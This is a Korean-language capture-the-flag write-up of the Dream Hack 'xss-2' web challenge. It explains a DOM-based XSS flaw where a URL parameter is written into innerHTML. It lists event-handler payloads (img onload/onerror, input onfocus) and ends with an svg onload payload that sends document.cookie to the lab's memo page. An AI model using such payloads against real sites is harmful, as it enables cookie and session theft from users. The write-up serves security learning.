[Dream Hack - Web] xss-2

문제 해석

/vuln 페이지

xss-1에서와 다르게 script 코드가 동작하지 않는다. /vuln 라우터를 살펴보니 vuln.html 페이지를 렌더링하고 있다.

@app.route("/vuln")
def vuln():
    return render_template("vuln.html")

{% block content %}
    <div id='vuln'></div>
    <script>
        var x=new URLSearchParams(location.search); 
        document.getElementById('vuln').innerHTML = x.get('param');
    </script>
{% endblock %}

코드를 살펴보면,

• location.search ⇒ URL 쿼리 문자열 부분을 반환한다. 예를 들어, http://example.com?page=1¶m=test인 경우 location.search는 ?page=1&param=test 가 된다.
• new URLSearchParams(location.search) 는 이 쿼리 문자열을 URLSearchParams 객체로 만든다.
• element.innerHTML 는 Element 내 포함된 HTML, XML, 마크업 정보를 읽거나 쓸때 사용된다. innerHTML 은 <script> 태그가 포함되어 있어도 <script> 부분을 실행되지 않도록 지정한다. 그러나 아래의 코드는 실행을 하므로 완전히 안전하다고 말할 수 없다.

1. onload 이벤트 핸들러
유효한 이미지 로드 후 onload 핸들러 실행 O
<img src="https://example.com/a.jpg" onload="alert()">

이미지 로드 실패 시 onload 핸들러 실행 X
<img src=x onload="alert()">

2. onerror 이벤트 핸들러
유효한 이미지 로드 후 onerror 핸들러 실행 X
<img src="https://example.com/a.jpg" onerror="alert()">

이미지 로드 실패 시 onerror 핸들러 실행 O
<img src=x onload="alert()">

3. onfocus 이벤트 핸들러
input 태그에 포커스 되면 onfocus 핸들러 실행
autofocus로 자동으로 포커스 수행 또는 URL hash 부분에 id 속성 값 입력
(e.g http://example.com/#ID)
<input type="text" id="ID" onfocus="alert()" autofocus>

 

풀이 방법

 

그럼 xss-1 에서 문제를 풀었던대로, /flag 페이지에서 값을 제출하여 쿠키에 FLAG를 저장한 뒤, memo에 그값을 이어붙일 수 있도록 설정하면 된다.

<svg/onload="alert(1)"/>

<script> 대신 코드를 실행할 수 있도록 <svg> 태그를 사용한다.

svg 뒤에 / 를 넣어 self-closing 태그를 사용함으로써 브라우저가 이 태그를 파싱하고, onload 이벤트를 실행하도록 한다. 이는 태그를 간단하게 닫으면서도 공격 코드를 삽입하는 방법이다.

//공격구문
<svg/onload=location.href="<http://127.0.0.1:8000/memo?memo=>"+document.cookie/>

 

참고

Element: innerHTML property - Web APIs | MDN

Element: innerHTML property - Web APIs | MDN